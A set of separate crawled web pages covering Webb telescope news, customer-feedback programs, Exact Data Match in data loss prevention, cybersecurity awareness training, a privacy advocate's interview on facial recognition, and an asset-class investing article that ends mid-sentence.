s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00271.warc.gz
en
0.911032
793
3.125
3
Lockheed Martin and the University of Arizona have handed over to NASA an imaging instrument for the James Webb Space Telescope ahead of a deep space research in 2018. The near infrared camera technology has been integrated into the telescope’s integrated science instrument module to function as the primary imaging component, Lockheed said Wednesday. Marcia Rieke, a Regents professor at the Arizona Department of Astronomy/Steward Observatory and principal investigator for the NIRCam program, said NASA intends for NIRCam to find candidates for planets in deep space and study how planetary systems form by using the JWST. The development team worked to integrate Teledyne-built infrared detector arrays and optical performance measuring devices into the imaging equipment, as well as test the technology at a Lockheed facility in Palo Alto, Calif.. “Now, NIRCam and the other instruments will be tested to prove their ability to function as a unit,†said Jeff Vanden Beukel, Lockheed NIRCam program director. The Webb telescope is a joint project of NASA, European Space Agency and Canadian Space Agency.
<urn:uuid:4df7207b-4e90-4323-ae0a-4b32deaec907>
CC-MAIN-2024-38
https://executivebiz.com/2014/04/jeff-vanden-beukel-lockheed-univ-of-arizona-team-to-test-webb-telescope-imaging-tech/
2024-09-15T00:56:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00171.warc.gz
en
0.909079
226
2.921875
3
When it comes to technology, Apple is one of the most recognizable and influential brands in the business, known for its sleek designs, innovative products, and exceptional customer experience. Apple co-founder Steve Jobs learned the value of customer early on. During a presentation at the 1997 Worldwide Developer Conference, Jobs said that: “One of the things I’ve always found is that you’ve got to start with the customer experience and work backwards to the technology. You can’t start with the technology and try to figure out where you’re going to try to sell it. […] As we have tried to come up with a strategy and a vision for Apple, it started with, ‘What incredible benefits can we give to the customer? Where can we take the customer?’” Jobs’s message is one that organizations across every industry should take to heart. Customer experience is the new competitive battlefield; in order to maintain market share and get ahead, companies must heavily factor customer experience into everything from product development to sales and marketing strategy. In order to do that, though, organizations must start by listening to the Voice of the Customer. Before we get started, let’s review some terminology related to Voice of the Customer. - Voice of the Customer: Called VoC for short, Voice of the Customer refers to the process by which businesses capture customer perceptions in order to gain firsthand perspective into what the customer experience is like, and how consumers are talking about their brand, product, or service. In doing so, businesses also gain a more holistic view into what their target audience wants, needs, and expects. There are any number of ways to approach this process, including running focus groups, conducting customer surveys, evaluating social sentiment, and reading customer reviews. - Customer Perceived Value: Customer perceived value refers to the value that customers assign to a product or service based on whether they believe it will meet their needs or expectations. Typically, when determining the perceived value of an item, customers will weigh its perceived benefit against its perceived cost. If the perceived benefit outweighs the perceived cost, the item will have a positive customer perceived value; if the inverse is true, the item will have a negative customer perceived value. The customer perceived value of a product or service is dependent on a number of factors, including its actual price and reputation; that said, if a business is able to convince consumers that its product or service is a triple threat — that is, that it offers physical, logical, and emotional benefits — it’s likely to secure a high customer perceived value. - Customer Journey: Customer journey can refer to one of two similar, but slightly different, processes, depending on the perspective from which you look at it. From the consumer’s perspective, the customer journey describes the entire buying process, starting with initial awareness of a need or a problem and ending with a purchase. From a business perspective, the customer journey is the complete sum of experiences a customer has with their brand. As a result, this version of the customer journey tends to be longer because it extends all the way from the consumer’s first interaction with marketing materials to ongoing efforts from the business to retain that customer and turn them into a brand advocate. To that end, companies must take care to nurture the customer at every stage of the journey in order to win not only their short-term business, but also their long-term loyalty. - Moments of Truth: Moment of truth is a marketing term used to describe a pivotal moment in the customer journey in which a consumer forms their opinion of a brand, product, or service. The moment of truth is most commonly the consumer’s first interaction with a brand, product, or service, however, some sources claim that there are as many as five moments of truth in the customer journey, including when the consumer researches a product prior to purchase and when the consumer (now customer) provides feedback on the product or service. - Market Research: Market research describes the collective efforts an organization takes to gather information about its target audience, specifically their needs and preferences. Market research typically falls into one of two main categories: primary research and secondary research. The process of conducting primary research is similar to capturing the Voice of the Customer in that it involves using phone interviews, online surveys, focus groups, and so on to collect information. Secondary research requires a business to review documentation from both internal and external sources — market reports, sales data, thought leadership articles, and so on — and draw conclusions from there. - Qualitative Research: Qualitative research is a research methodology that involves the analysis of unstructured and non-numerical data, such as text, video, or audio. With Voice of the Customer, qualitative research data might take the form of survey and interview responses, audio recordings from focus group sessions, and so on. - Quantitative Research: Quantitative research is a research methodology that involves the analysis of statistical and numerical data. With Voice of the Customer, quantitative research data might take the form of yes/no questions, customer rankings, CSAT and NPS scoring, and so on. - Product Development: Product development refers to the process by which businesses bring a product from a concept or idea to a tangible item. The traditional new product development lifecycle consists of eight stages: Idea Generation, Idea Screening, Concept Development, Business Strategy Development, Product Development, Test Marketing, Commercialization, and Introduction. The Impact of Voice of the Customer on Business By now, you’ve likely heard numerous industry publications and thought leaders tout the importance of customer experience — perhaps even to the point where it seems tiresome. But CX has become a buzzword for good reason: According to one oft-cited statistic, 89% of companies report to competing on the basis of customer experience. According to another, more recent report, experience-driven companies are able to increase revenue 1.4x more than other companies; those same companies were also able to increase customer lifetime value 1.6x more than other companies. By 2020, CX is expected to overtake price and product as the key brand differentiator. Given the vast opportunities CX presents and the significant impact it has on business, it’s a bit easier to forgive various outlets for talking about it ad nauseam. This also why Voice of the Customer is so important — without a concrete understanding of customers’ motivations and desires, it’s nearly impossible to deliver an experience that not just meets but completely exceeds their expectations. And that’s just one benefit; by implementing a Voice of the Customer program in your organization, you can also: - Identify potential brand crises before they take place. Even something as simple as a single negative product review can point to a larger issue. By monitoring present public sentiment about your brand product, you can identify potential problems before they have the chance to turn into a full-blown crisis. In addition to supporting crisis prevention, you can also leverage Voice of the Customer for crisis management. In the immediate aftermath of a major event, keep an ear to the ground and listen to what people have to say about your brand’s response, how they’ve been affected, and whether they believe you’ve successfully resolved the issue at hand. - Test out new concepts and ideas. Have an idea for a new product or service, but don’t want to invest in a full product development lifecycle until you know, with relative certainty, that it’ll be a success? Put it to the test with Voice of the Customer! Solicit feedback on new concepts and ideas from your existing customer base to see whether they have a chance of taking off or will be dead on arrival. - Give customers what they actually want. Rather than simply guess at what your customers want and risk disappointment, go directly to the source. One of the key benefits of VoC is that it provides an accurate look at how customers think and feel, what pain points they need resolved, and what they want and expect from a brand, product, or service. - Increase customer retention — and revenue. By consistently delivering goods and services that align with expectations and resolve common challenges, you’re more likely to win customers’ long-term business and increase your profit margins accordingly. Common Voice of the Customer Techniques & Questions We’ve already mentioned some common Voice of the Customer data collection techniques you can implement in your business, but let’s look at a few more: Once you’ve determined which techniques to leverage, the next step is to come up with a series of questions to ask customers to get a sense of how they think and feel. Here are some sample questions to help you get started: - What gender do you identify as? - What is your age? - Where do you live? - What is the highest degree or level of education you have completed? - What is your current employment status? - What is your marital status? - What level of expertise do you have in [relevant subject area]? - How do you prefer to learn (reading, listening, watching, etc.)? - What is your preferred method of communication (email, phone, text/SMS, etc.)? - What characteristics do you look for in a company/product? - What are the biggest challenges you currently face? - How can we help you overcome those challenges? - What product/service do you wish someone would create? - What comes to mind when you think about [company name/product name]? - Which of our products or services do you currently use? - Why did you choose our company/product over the competition? - Are there any other companies whose product(s) you prefer over ours? - If so, why? - Can you provide an example of how you’ve benefited from using our product/service? - On a scale of 1–5, with 1 being “Not at All Satisfied” and 5 being “Very Satisfied,” how satisfied are you with our products/services? - Would you recommend [company/product]? - Why or why not? - How can [company name] improve your customer experience? - What can our company do to better serve your needs? - What else would you like us to know? How to Implement a Voice of the Customer Program When developing and implementing a Voice of the Customer program, there are a few basic steps to follow: What to Look for in a Voice of the Customer Solution There are numerous VoC tools and solutions on the market today, each with its own set of advantages and disadvantages. Whether you’re small-to-medium-sized B2C company or an enterprise-level B2B business, we’ve compiled this list of questions to help you evaluate various solutions and find the VoC tool that’s right for you: - Does this solution store data in a centralized repository? - Does this solution integrate with the technology our organization currently uses? - Does this solution make it easy to share data with key stakeholders? - Will this solution enable us to custom configure role-based dashboards? - How difficult will it be to train our employees to use this solution? - Will this solution enable our customers to provide feedback through whatever channel is most convenient for them? - Does this solution combine structured and unstructured feedback in order to create a holistic view of the customer? - Does this solution support interdepartmental collaboration? - Does this solution incorporate employee feedback in order to provide valuable context to the customer experience? Hitachi Solutions & Microsoft Dynamics 365 Customer Voice Microsoft recently released Dynamics 365 Customer Voice, a real-time feedback management solution that, according to Microsoft General Manager Brenda Bown, is “designed to empower businesses and organizations to build better products [and] deliver better experiences to customers.” Customer Voice includes an exciting array of features and capabilities, including: - Premade, easy-to-personalize survey templates - Custom-configured dashboards for real-time reporting - Automated KPI monitoring for built-in satisfaction metrics - Tight integration with the entire D365 application suite and Power Platform - And more If you’re interested in discovering all that D365 Customer Voice has to offer, Hitachi Solutions is offering a one-day Customer Voice Enablement workshop. In this workshop, you’ll learn how to leverage Customer Voice to generate real-time insights that enhance the customer experience. You can sign up for the workshop by following this link. If you have any other questions about Voice of the Customer, including how to get started creating and implementing a VoC strategy, Hitachi Solutions is here to help. Contact us today to find out what we can do for you. Video: Become a Customer Service Self-Service Superhero! Come learn about the evolving suite of Customer Service solutions available on the Power Platform and how these technologies can make you a superhero in the eyes of your customer.https://play.vidyard.com/WGvV2eWZR8wLUkkorv5iBF.html?
<urn:uuid:9a7a7dc7-f3b6-4ddd-85dc-3c23b2f75f06>
CC-MAIN-2024-38
https://global.hitachi-solutions.com/blog/voice-of-the-customer/
2024-09-17T09:20:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00871.warc.gz
en
0.943812
2,746
2.578125
3
As the name suggests, Exact Data Match (EDM) compares two fields character by character in separate records. It is often referred to as deterministic linkage because it provides a definite outcome: whether the records match. An EDM tool can only be employed when your dataset contains uniquely identifiable attributes. A unique attribute is a data characteristic that cannot be the same for two entities. What Is EDM in Cybersecurity? Exact Data Match is a tool used during the data discovery phase. It helps uncover business information and specific sensitive data in both organised and unorganised data repositories. Simply put, EDM is a technique used for data classification and matching. It identifies instances of data loss involving sensitive records stored in a structured data format. It also employs data fingerprinting instead of pattern-matching techniques to protect sensitive data. EDM in cybersecurity aims to identify and safeguard consumer sensitive information, such as MRN, bank account numbers, and social security numbers, by examining the data rather than relying on pattern-matching methods. This approach allows EDM to detect sensitive data accurately while minimising false positives, making it an efficient tool for discovering sensitive data. How Does Exact Data Match Work? EDM analyses large amounts of structured data organised in rows and columns. To use EDM, a Data Prevention tool is installed on the customer's local server, which fingerprints these extensive data stores containing billions of cells. A Data Loss Prevention (DLP) tool relies on the encrypted hash of the sensitive data you upload. The service indexes these encrypted hashes to create a dataset. This indexed hash data is used in the Security policy of the DLP tool to match and prevent the transmission of sensitive data. Trained fingerprints are securely uploaded to the DLP using innovative fingerprinting techniques. This process allows for quickly deploying Data Protection rules using these large fingerprint datasets to safeguard the most sensitive data in its original form. Referred to as Structured Fingerprints, these EDM Fingerprints can be used as criteria to match content in data classifications, effectively preventing data exfiltration when the fingerprints are an exact match. With its precise matching capabilities, EDM not only relieves administrators from the manual effort of crafting complex regular expressions but also ensures the highest level of compliance adherence for enterprises. Explaining the EDM Workflow - Export user records from a database to a .csv or .tsv file. One can use the pipe command (|) to send user records from the database to the EDMTrain tool (a fingerprinting tool) for processing. - Generate the EDM-enhanced fingerprint file and create an index. This step involves creating a unique fingerprint for each record in the user records file and generating an index to search and match fingerprints later efficiently. - Define the criteria for content classification using the exact data-matching approach. This means specifying the specific data elements or patterns that need to be matched exactly to classify the content correctly. - Create a rule set that incorporates the EDM (Enhanced) classification criteria. This rule set will define the actions to be taken when a match is found based on the content classification criteria. Apply this rule set to a Data Loss Prevention (DLP) policy, which governs the protection and handling of sensitive data. Why Is EDM Important? Suppose a company wants to monitor its employees' use of social media during work hours to ensure productivity. They deploy a monitoring system that scans network traffic for any activity related to social media sites. Now, this approach may generate numerous false positive alerts. For instance, if an employee uses a messaging platform like Facebook Messenger for work-related communication or accessing a professional networking platform like LinkedIn, the monitoring system might flag it as a violation and trigger an unnecessary alert. This can lead to frustration for both the employee and the security administrator who receives the alert. The organisation can refine the monitoring process with Exact Data Matching (EDM). Instead of simply monitoring all social media activity, the system can focus on specific social media platforms that are explicitly prohibited or pose a higher security risk. This way, only the designated platforms will trigger alerts, while legitimate use of other platforms will not be flagged. EDM allows admins to prioritise investigating policy violations or potential security threats by reducing false positives. It streamlines the system by minimising unnecessary alerts and allows for a more efficient allocation of resources towards addressing genuine concerns. Benefits of EDM Inline Inspection and Enforcement A Data Prevention Tool swiftly blocks data from leaving the organisation without negatively impacting user experience. EDM offers inline inspection for all network traffic, whether users are connected to the network or not. This assessment improves the accuracy of identifying data loss incidents and significantly reduces false positive alerts. EDM securely handles the application and user traffic by adding native SSL inspection and boosting complete security and visibility. Accurate and Detailed Data Classification The DLP solution deploys advanced techniques, including predefined policies and machine learning algorithms, to precisely classify sensitive data. This level of granular data classification empowers organisations to apply appropriate security measures and effectively prevent unauthorised access or leakage of sensitive information. Compatible with Cloud Scalability Users can fingerprint and match up to a billion data cells at any given time by leveraging the scalability of a cloud. Deploying an EDM solution on-premises may give rise to performance limitations due to the resource-intensive nature of the technology. The cloud provides the capacity and resources to handle large-scale data matching efficiently. Limitations of EDM Inability to Handle Variations EDM relies on exact matches between data fields, which means it may struggle to handle variations in data entry. For example, if a name is misspelt or abbreviated differently in different datasets, EDM may fail to identify the match. Sensitivity to Data Quality EDM's effectiveness depends on the quality and consistency of the data being matched. Inaccurate or incomplete data can lead to false matches or missed matches. Data cleaning and preprocessing are necessary to improve the accuracy of EDM results. Lack of Contextual Understanding EDM only considers exact matches without taking into account contextual information. It cannot comprehend the meaning or context behind the data, potentially leading to false positives or missed matches. For example, EDM may match two individuals with the same name and similar ages, but they may be different people. As datasets' size and complexity increase, EDM's scalability becomes a concern. Matching large volumes of data can be time-consuming and resource-intensive, especially when dealing with complex data structures or multiple data sources. Lack of Flexibility in Matching Criteria EDM operates on predefined matching criteria, such as exact matches on specific data fields. It may not be able to adapt easily to different matching requirements or accommodate fuzzy matching approaches. Susceptibility to Data Privacy Risks The use of EDM involves sharing sensitive data across different systems or organisations, which can introduce privacy risks if adequate security measures are not in place. How Can InstaSafe Help? As seen above, there is a growing concern about the potential risks associated with data matching and privacy breaches. Care must be taken to ensure data protection, encryption, and compliance with relevant privacy regulations. InstaSafe Zero Trust Application Access solution assures granular control and strict access restrictions for every user, eliminating any unauthorised access to sensitive data. Our solution offers context-aware access controls, going beyond mere exact matches. Visit our website or contact us now to learn more and schedule a demo. Frequently Asked Questions (FAQs) What languages does EDM support? EDM can support multiple languages, primarily relying on exact matches between data fields rather than language-specific processing. However, the effectiveness may vary based on the quality and consistency of data in different languages. What is EDM classification? EDM classification refers to categorising data based on specific criteria or attributes. In the context of Exact Data Match (EDM), it involves matching and classifying data based on exact matches of personally identifiable information (PII) across different datasets. What are IDM and EDM in DLP? IDM (Identity and Access Management) and EDM (Exact Data Match) are both components of Data Loss Prevention (DLP) systems. IDM focuses on managing user identities and controlling access to sensitive data. In contrast, EDM identifies and matches personally identifiable information (PII) across datasets to detect potential data breaches or unauthorised access. Can you give an example of EDM? An example of EDM could be matching customer data from two databases to identify duplicate entries. For instance, if a company has two separate customer databases, EDM can compare and match customer names, addresses, and other relevant information to identify individuals who appear in both databases. This helps in consolidating and de-duplicating customer records. Biometrics Authentication | Certificate Based Authentication | Device Binding | Device Posture Check | Always on VPN | FIDO Authentication | FIDO2 | Ldap and SSO | Multi Factor Authentication | Passwordless Authentication | Radius Authentication | SAML Authentication | SAML and SSO | What is Sdp | Devops Security | Secure Remote Access | Alternative of VPN | Zero Trust VPN | Zero Trust Security | Zero Trust Network Access | ZTAA
<urn:uuid:4493c004-686c-4dd1-8d68-ed808b3928c1>
CC-MAIN-2024-38
https://instasafe.com/glossary/what-is-exact-data-match-edm/
2024-09-17T08:09:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00871.warc.gz
en
0.886445
1,941
2.921875
3
The Importance of Cybersecurity Awareness: Educating Users to Mitigate Risks In today's digital age, where cyber threats continue to evolve in complexity and sophistication, cybersecurity awareness has become paramount. Organizations must recognize that their employees play a vital role in maintaining a secure environment. Educating users about cybersecurity risks, best practices, and the importance of vigilance is essential in mitigating potential threats. This article explores the significance of cybersecurity awareness and the key factors for success. Understanding the Landscape Cyberattacks pose significant risks, including data breaches, financial losses, and reputational damage. Hackers exploit vulnerabilities in systems and often target unsuspecting users through methods like phishing, social engineering, and malware attacks. By increasing cybersecurity awareness, organizations can minimize these risks and build a strong defense against potential threats. The Role of Education 1. Recognizing Threats: Cybersecurity awareness educates users about various threats and their implications. Users gain an understanding of common attack vectors and are better equipped to identify suspicious emails, links, or requests, minimizing the chances of falling victim to malicious activities. 2. Practicing Good Cyber Hygiene: Educating users about good cybersecurity practices fosters a proactive security culture. This includes regularly updating software, using strong and unique passwords, implementing multi-factor authentication, and securely handling sensitive information. Such practices create a resilient and secure environment. 3. Raising Awareness of Social Engineering: Social engineering attacks rely on manipulating individuals into divulging sensitive information or taking malicious actions. Educating users about these tactics—such as phishing, pretexting, or baiting—helps them recognize warning signs and respond appropriately, mitigating potential risks. 4. Promoting Data Privacy: Cybersecurity awareness emphasizes the importance of protecting personal and sensitive data. Users learn about data privacy regulations, secure data handling practices, and the potential consequences of data breaches. This knowledge empowers individuals to take necessary precautions to safeguard personal and organizational information. 5. Encouraging Incident Reporting: Effective cybersecurity awareness programs encourage users to report any suspicious activities promptly. Establishing clear reporting channels and fostering a blame-free culture encourages users to come forward, enabling swift response and containment of potential security incidents. Key Factors for Success: 1. Leadership Support: Organizations must prioritize cybersecurity awareness and secure leadership support. When leaders champion cybersecurity initiatives and allocate resources for education and training, employees recognize the importance of cybersecurity and are more likely to embrace best practices. 2. Continuous Education: Cybersecurity awareness is an ongoing process. Regular training sessions, workshops, and communication campaigns ensure that users remain updated on emerging threats and evolving best practices. Reinforcing knowledge and providing real-life examples enhance the effectiveness of awareness programs. 3. User-Friendly Training: Effective cybersecurity awareness programs employ user-friendly training methods. Interactive modules, simulations, and engaging content capture users' attention and promote better understanding and retention of cybersecurity concepts. 4. Tailored and Relevant Content: Customizing training content to address specific organizational risks and user roles increases its relevance. Users must understand how cybersecurity practices apply to their daily responsibilities, ensuring practical implementation and a sense of ownership. 5. Collaboration and Engagement: Engaging users through interactive exercises, gamification, and cybersecurity quizzes fosters a sense of ownership and collaboration. Encouraging dialogue, sharing success stories, and recognizing proactive behavior creates a positive cybersecurity culture. Cybersecurity awareness is crucial for organizations to mitigate risks and protect against evolving cyber threats. By educating users about potential risks, best practices, and the importance of vigilance, organizations can empower their employees to be active defenders against cyberattacks. Eccentrix's Cyberawareness for Users class offers comprehensive training, equipping individuals with the knowledge and skills to navigate the cyber landscape securely. By linking the article to this class, organizations can encourage their employees to enhance their cybersecurity awareness and contribute to a safer digital environment. With a well-informed and vigilant user base, organizations can fortify their defenses and minimize the impact of cyber threats.
<urn:uuid:2314154a-890b-4386-9107-eb95a46a0f0d>
CC-MAIN-2024-38
https://www.eccentrix.ca/en/eccentrix-corner/the-importance-of-cybersecurity-awareness
2024-09-08T23:45:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00771.warc.gz
en
0.902705
812
3.046875
3
Facial Biometrics Pose Privacy Woes Lack of Consent Bothers Privacy Advocate Beth Givens"Facial recognition technology can be used without the knowledge or the consent of the individual, to be totally oblivious," Beth Givens, founder and director of the Privacy Rights Clearinghouse, a privacy advocacy organization, says in an interview with GovInfoSecurity.com (transcript below). "Yet, once you identify that person based on the unique characteristics of their face, you could then match it with other databases." Use of facial biometrics could affect a wide-range of people. For example, Givens says, protesters could easily be identified at an assembly. Shoppers could be targeted based off of their shopping habits. And customers at banks could be given preferential treatment. To make her point, Givens cites a study conducted by Carnegie Mellon University, in which researchers, using only a photo of a person's face and information made publicly available online, identified a person's birth date, personal interests and Social Security number. "Once you know a person's name, birth date, and social security number, you have enough information to commit new account fraud or identity theft," Givens says. For information security officers in banking, government and healthcare, using biometrics as a possible tool to protect their critical data is fine if such applications are backed up with solid privacy and security policies and practices, Givens says. In the interview, Givens explains that use of facial recognition technology could: - Violate privacy rights by not getting an individual's consent. - Result in unequal treatment of consumers by businesses. - Encourage stalking and violence. Givens founded the Privacy Rights Clearinghouse in 1992. She developed the clearinghouse's Fact Sheet series that addresses a wide variety of privacy matters. Givens also authored the encyclopedia entries on identity theft for Encyclopedia of Privacy, World Book Encyclopedia and Encyclopedia of Crime and Punishment. She also authored The Privacy Rights Handbook: How to Take Control of Your Personal Information (Avon, 1997) and co-authored Privacy Piracy: A Guide to Protecting Yourself from Identity Theft (1999). She contributed a chapter on consumer and privacy rights to the 2006 book, RFID: Applications, Security and Privacy. Privacy Rights Clearinghouse ERIC CHABROW: Before we discuss your concerns with facial recognition technology, please take a few moments to tell us about the Privacy Rights Clearinghouse.BETH GIVENS: We're not a new organization. We were founded nearly 20 years ago, before the Internet actually, and before a lot of these emerging technologies came on the scene. We started as a California-only non-profit consumer education and consumer advocacy group. Since the advent of the Internet and when our website went online in 1996, we are now a nationwide group with a two-part mission. We do consumer education. We are kind of a "Dear Abby" of privacy in that we invite people to contact us with their questions and their complaints. We learn a lot just by talking directly with people. Then secondly, we are involved in some advocacy privacy in the California state legislature. Facial Recognition Threats CHABROW: The Privacy Rights Clearinghouse cautions that facial recognition technologies, especially as it becomes more sophisticated, may be one of the greatest privacy threats of our time. How so?GIVENS: I have kind of a mantra in terms of privacy rights and that is: individuals deserve transparency and they need control. Those two key words - transparency and control - say a lot. Facial recognition technology can be used without the knowledge or the consent of the individual, to be totally oblivious, totally invisible to the individual and yet once you identify that person based on the unique characteristics of their face, you could then match it with other databases. You could connect online information to off-line information. There are a lot of possibilities in terms of where that simple capture of one's face will lead. CHABROW: Can you give an example to that? GIVENS: I'll give you two. One is sort of in the public arena and one is in the commercial arena. Let's just say that you are demonstrating at a public event. You may not like something that the government has done. You may be against a certain law, or a certain proposal, and you are out in public at an event. Those individuals who are participating in that event could have their faces captured say by law enforcement or other government agencies and then be identified in that way. That's kind of the constitutional side of the issue. I think most people when they're out in public take for granted that they're anonymous. I think they know that when they go into a commercial space, say a store, there are video cameras all over the place taking their photo, but now I'm moving over to the commercial sector application. You could actually be identified when you walk into a store and if that store has a database on you, let's just say you're a frequent shopper or maybe even this is the first time, perhaps the store is cooperating with an alliance of merchants, and you could be identified. They might know then: are you an impulse shopper? What sorts of items are you likely to buy? What is your income level? You might be treated a certain way based on those things that they know about you. Or let's just say it's a bank. You walk in and they're able to immediately identify you as a top-notch, important, valued moneyed customer, and you might get shuttled to the front of the line or to a special area for preferred customers. What if you are somebody coming in who just has a small account and a few transactions? You might not get served as well. Another commercial application that we are particularly concerned about is price discrimination. You might be offered one price, and this is particular in the online arena, if you have a certain profile and another price if you have another. There are some, I think, tremendous privacy implications both on the constitutional side of that privacy dividing line and the informational privacy side. Facebook & Facial Recognition CHABROW: In the press release you put out, you mentioned something about Facebook and combining that with other kinds of technologies including facial recognition. Can you discuss your concerns with that?GIVENS: Yes. In fact, let me refer to the Carnegie Melon University study that really peaked our interest in this issue. They actually took Facebook photos. Now they didn't use the Facebook facial recognition technology. All they did was they went on Facebook and retrieved photos to then match against photos that they obtained from a different site, some online dating sites where people were not named. They took these essentially anonymous photos from the dating site and were able to match it to publicly displayed photos on Facebook using an off-the-shelf facial recognition software program called PITT PATT (Pittsburgh Pattern Recognition). By the way, Google has since purchased PITT PATT which I think is a significant matter. They were able to identify ten percent of all of those anonymous people from the dating site. In another, I'm assuming it was their Carnegie Melon University campus, they took photos of students walking around on campus and they were actually able to identify 31 percent of those, and then I think even more fascinating is they took a photo of a person's face and they took all the information they could find publicly available online and from that, and this is astounding, they figured out the person's birth date, their personal interest and their social security number. Now for me, since we've been involved in identity theft for a long time, once you know a person's name, birth date, and social security number, you have enough information to commit new account fraud or identity theft. CHABROW: Are you aware of any laws that prohibit or limit the use of facial recognition technology or are you aware of any bills before Congress or state legislatures that would restrict the use of facial recognition products? GIVENS: Well I know in Europe this is a big deal. In Germany, I know they're very, very concerned about this, and I think they've demanded that Google not use this technology. The European scene is quite different in terms of privacy laws than the U.S. scene however. I am not aware of the commercial side of the fence, a law specifically stating that facial recognition is prohibited or limited in anyway. I don't think we're there yet. This is just to the best of my knowledge, however. I think with the attention that this issue is getting, there could very well be some bills, especially at the state level, perhaps even in Congress that would address this issue. I know that Congress has addressed location-based identification services related to the mobile phone for example, and that's an example of an emerging technology that also has significant privacy implications. It wouldn't surprise me with the additional interest in this issue if there would be some attention paid, either at the state level or in Congress. Biometrics & Protecting Assets CHABROW: Our audience largely consists of those in government, healthcare, financial services and other industries responsible for safeguarding their digital and physical assets. Biometrics including perhaps facial recognition could be one of the tools in their arsenal to do just that, such as facial scanning to identify those authorized to enter secured buildings or access a database containing sensitive data. Do you see that as a problem?GIVENS: I think if they back up those applications with good, solid privacy and security policies and practices than they will be in good shape. I think they should also pay attention to the whole emerging technology of biometric encryption. There is the biometric template. That's essentially the long string of zeros and ones that relates to the shape of your face and the key identification points on your face. And of course, all of this is then stored in a database and then other information about you is related to that long string of zeros and ones that identifies your face. It's a database really where all the action is. Using biometric encryption I think would be a very important thing for people who read and listen to your messages to consider, and they might want to look at what the Providence of Ontario Privacy Commissioner has been doing in that regard. Ann Cavoukian has certainly been leading the way on this issue. CHABROW: And do you know much about what is going on in Ontario? GIVENS: They've been using it in the gaming and lottery industries and have been apparently for quite some time, because as you probably know when you walk into a casino you're giving up all of your privacy. And as you probably already know you're on camera and identified from the moment you enter to the moment you leave. I think if you want to sort of examine a case history of surveillance, take a look at the casino industry. Up in Ontario they've been working with encrypting all of that data compiled through digital surveillance and facial recognition biometrics in order to safeguard that data and prevent abusive uses of it. CHABROW: Anything else you would like to add? GIVENS: There's another key issue that I'm very concerned about. We're contacted from time-to-time by victims of stalking and domestic violence. I must say that one of the key concerns that I have is the potential to use facial recognition technology and identification applications to actually identify individuals and then stalk them. I know that Google has been reluctant to actually put out a facial recognition app for mobile phones, and I would hope that other companies would think long and hard about this particular matter before they actually do that. If you see somebody on the street that catches your eye and you are somebody who may be obsessive or with a stalking mentality, imagine the harm that could be done with this technology. It's another concern that I want to toss out because I think we're going to see this as a growing problem.
<urn:uuid:9fdb3f33-a880-4b6b-aaf3-6eeef33f9b2d>
CC-MAIN-2024-38
https://www.inforisktoday.asia/interviews/facial-biometrics-pose-privacy-woes-i-1231
2024-09-10T04:40:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00671.warc.gz
en
0.968103
2,472
2.734375
3
We may earn a small commission if you click links and make a purchase. This article is for informational purposes only and does not constitute financial advice. Last Updated on June 5, 2024 If you have ever questioned the concept of an asset class and the importance of grasping historical investment returns for your financial well-being, this is the right resource for you. This comprehensive article will delve into various types of asset classes, such as stocks, bonds, real estate, commodities, and cash equivalents. Moreover, it will examine the historical investment returns associated with each asset class and the factors influencing these returns. Upon completing this article, you will acquire a more profound comprehension of utilizing historical investment returns to make well-informed decisions regarding your future investments. What is an Asset Class? An asset class represents a grouping of investment vehicles that share similar characteristics and are governed by the same laws and regulations, playing a crucial role in asset allocation and diversified investment strategies. As an investor, you often distribute your funds across various asset classes to manage risk and potentially maximize returns. Typical asset classes comprise equities (stocks), fixed income (bonds), real estate, commodities, and cash equivalents. Each asset class presents its distinct risk-return profile, allowing you to tailor your portfolio in alignment with your financial objectives and risk tolerance. Through diversification across multiple asset classes, you can mitigate the impact of market fluctuations on the overall performance of your portfolio. Types of Asset Classes The main types of asset classes include stocks, bonds, real estate, cash, and commodities, each offering unique investment opportunities and risk profiles. Stocks, representing ownership in a company, have the potential for high returns but come with significant volatility. Bonds, on the other hand, are debt instruments issued by governments or corporations, providing regular interest payments but with lower potential for growth. Real estate investments involve buying physical properties, which can generate rental income and appreciate in value over time. Cash, such as savings accounts or money market funds, offers liquidity and stability but usually yields lower returns. Commodities, like gold or oil, can be volatile due to supply and demand factors. Why is Understanding Historical Investment Returns Important? Understanding historical investment returns is crucial for informed financial planning and crafting effective investment strategies in your professional endeavors. It grants insights into how various asset classes have performed across different economic cycles. Analyzing historical data allows you to assess the potential risks and rewards associated with different investment opportunities. This information aids in setting realistic financial objectives and determining suitable asset allocations to attain those objectives. Moreover, historical investment returns can act as a valuable benchmark for evaluating the performance of your current investment portfolio and making necessary adjustments. Integrating historical data into your investment decision-making processes can enhance overall portfolio management and improve the chances of achieving long-term financial goals in your professional journey. Historical Investment Returns by Asset Class Analyzing historical investment returns by asset class offers valuable insights into the performance, risk, and potential returns of different investments. This practice enables you to make informed comparisons and effectively manage your investment portfolios. When considering stocks as part of your investment portfolio, it is important to understand that they represent equity ownership in companies and historically have offered substantial capital growth. However, stocks also come with higher volatility compared to other asset classes. The volatility in the stock market can result in significant fluctuations in the value of investments. As an investor, it is crucial to maintain a long-term perspective when including stocks in your portfolio. Despite the associated risks, stocks have demonstrated strong performance compared to other asset classes over the long term, presenting investors with the potential for significant capital growth. Many investors seeking growth opportunities turn to stocks due to the potential benefits of aligning with the success and profitability of leading companies across various sectors. Bonds, as fixed-income securities, have historically provided more stable returns compared to stocks, often acting as a buffer against market volatility. Investors make loans to governments or corporations when they invest in bonds, with the borrower committing to pay interest over a specified period before repaying the principal. The attraction of bonds lies in their relative safety and dependable income stream. During periods of economic uncertainty, bonds are typically viewed as more secure investments than stocks due to their lower volatility. Bond prices tend to move in the opposite direction of interest rates. In favorable market conditions with declining interest rates, bond values tend to rise, potentially offering capital gains to investors. Real estate investments can be a valuable asset for you, serving as a hedge against inflation and providing diversification opportunities that offer both income and potential capital appreciation. In different economic cycles, real estate has demonstrated its resilience by consistently generating income through rental returns, 